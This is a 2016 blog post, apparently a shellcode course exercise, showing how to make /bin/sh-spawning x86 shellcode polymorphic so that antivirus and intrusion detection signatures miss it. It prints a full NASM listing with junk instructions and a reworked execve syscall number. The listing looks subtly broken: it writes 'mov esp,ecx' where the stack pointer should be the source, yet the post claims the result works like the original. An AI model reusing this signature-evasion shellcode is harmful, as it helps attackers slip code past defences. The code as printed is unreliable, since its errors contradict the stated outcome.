Thursday, March 10, 2016

6_1 - Polymorphism: spawning "/bin/sh"

6_1 -  SPAWNING "/bin/shell" 


The goal of this exercise would be to illustrate polymorphism, one of the shellcode writing techniques commonly used to evade surveillance and detection of the Anti Virus (AV) and Intrusion Detection (ID) systems. 

The task consist on taking an original and easily detectable shellcode, and altering its internal structure so that it does not match any of the patterns that are part of the databases detection tools. 

In other words, since both AV and  ID systems work with detection patterns, altering the pattern of the shellcode keeping its funcionality or semantics validity. These techniques have the advantage of the so many abundant solutions, because every change implies a difference in the pattern of the new generated shellcode.

Specifically, there are two types of operations commonly used for creating polymorphic shellcodes:

a) replacement of certain instructions for equivalent functionality.

b) introduction of "junk" instructions whose effect on the functionality is harmless, but however contribute to distort the original shellcode.


- The original program to be modified in this practice has the effect of spawning a "/bin/sh" shell:

- Let's see three possible modifications:

a) introducing junk instructions like "std" and "cld" (setting and clearing the direction flag), what does not alter the semantics validity of the program.

b) the instruction "cltd" can be removed because it does not have any effect on the funcionality.

c) the exceve() syscall has got 11 as identifier, which must be moved at eax in some way. It can be introduced either directly (mov al,0xb) or progressively (8+2+1 = 11) with three instructions:

mov    al,0x8   ; 8 is moved to eax
add al,0x2 ; 2 is added to eax
inc eax ; eax is incremented by 1

- The resulting assembly program of applying these modifications is A6_1.nasm:

global _start
section .text

std ; junk instruction

xor    eax,eax
push   eax

push   0x68732f2f
push   0x6e69622f

mov    ebx,esp
push   eax
push   ebx
mov    esp,ecx

; cltd <- removing this useless instruction

; mov al,0xb <- 11 is moved to eax
mov    al,0x8   ; 8 is moved to eax
add al,0x2 ; 2 is added to eax
inc eax ; eax is incremented by 1

int    0x80

cld ; junk instruction


- Assembling and linking A6_1.nasm:

- Extracting the shellcode:

- Applying to ShellcodeTest.c program:

- Compiling ShellcodeTest.c:

- Executing ShellcodeTest.c the result is the same as the original program, a "/bin/shell" is spawn:

- While the original shellcode had 23 Bytes, the new one has got 28 Bytes. It means an increment of 21%.